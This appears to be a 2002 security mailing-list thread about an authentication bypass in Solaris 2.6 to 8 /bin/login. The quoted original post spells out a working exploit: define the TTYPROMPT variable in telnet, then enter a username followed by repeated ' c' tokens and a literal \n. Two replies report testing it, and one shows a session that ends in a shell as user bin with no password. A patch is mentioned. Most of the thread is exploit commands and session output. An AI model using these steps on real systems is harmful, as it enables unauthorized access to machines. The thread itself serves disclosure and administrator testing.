Re: Solaris 2.6, 7, 8

From: Roy Kidder (rkidderat_private)
Date: Thu Oct 03 2002 - 12:03:13 PDT

    Works like a champ on Solaris 2.6/Sparc:

    ---------- begin ----------

    ~ $ telnet
    telnet> environ define TTYPROMPT abcdef
    telnet> o localhost
    Trying 127.0.0.1...
    Connected to localhost.
    Escape character is '^]'.

    SunOS 5.6

    bin c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c
    c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c\n
    Last login: Thu Oct  3 14:49:33 from localhost
    Sun Microsystems Inc.   SunOS 5.6       Generic August 1997
    You have new mail.
    bin@ovcle$ uname -a
    SunOS ovcle 5.6 Generic_105181-14 sun4u sparc SUNW,Ultra-4
    bin@ovcle$ who am i
    bin        pts/6        Oct  3 15:05    (localhost)

    ---------- begin ----------

    On Wed, 2002-10-02 at 13:23, Ramon Kagan wrote:
    > Sorry but I can't reproduce this on a Solaris 7 machine.
    >
    > sunlight.ccs% telnet
    > telnet> environ define TTYPROMPT abcdef
    > telnet> o localhost
    > Trying 127.0.0.1...
    > Connected to localhost.
    > Escape character is '^]'.
    >

    > SunOS 5.7
    >
    > login: bin c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c
    > c c c
    > c c c c c c c c c c c c c c c c c c c c c c c c c c c c c\nPassword:
    > Login incorrect
    >

    > As you can see I get a request for a username/password.
    >
    > Ramon Kagan
    > York University, Computing and Network Services
    > Unix Team -  Intermediate System Administrator
    > (416)736-2100 #20263
    > rkaganat_private
    >
    > -------------------------------------
    > I have not failed.  I have just
    > found 10,000 ways that don't work.
    > 	- Thomas Edison
    > -------------------------------------
    >
    > On Wed, 2 Oct 2002, Jonathan S wrote:
    >
    > > Hello,
    > >
    > >   Solaris 2.6, 7, and 8 /bin/login has a vulnerability involving the
    > > environment variable TTYPROMPT.  This vulnerability has already been
    > > reported to BugTraq and a patch has been released by Sun.
    > >   However, a very simple exploit, which does not require any code to be
    > > compiled by an attacker, exists.  The exploit requires the attacker to
    > > simply define the environment variable TTYPROMPT to a 6 character string,
    > > inside telnet. I believe this overflows an integer inside login, which
    > > specifies whether or not the user has been authenticated (just a guess).
    > > Once connected to the remote host, you must type the username, followed by
    > > 64 " c"s, and a literal "\n".  You will then be logged in as the user
    > > without any password authentication.  This should work with any account
    > > except root (unless remote root login is allowed).
    > >
    > > Example:
    > >
    > > coma% telnet
    > > telnet> environ define TTYPROMPT abcdef
    > > telnet> o localhost
    > >
    > > SunOS 5.8
    > >
    > > bin c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c
    > > c c c c c c c c c c c c c c c c c c c c c c c c c c c c c\n
    > > Last login: whenever
    > > $ whoami
    > > bin
    > >
    > > Jonathan Stuart
    > > Network Security Engineer
    > > Computer Consulting Partners, Ltd.
    > > E-mail: jonsat_private

    Roy Kidder
    Data Network Engineer
    CoreComm
    "...these products' frequent failures are
    legitimized by ubiquitous acquiescence."
         -- Doc Searls on Microsoft products.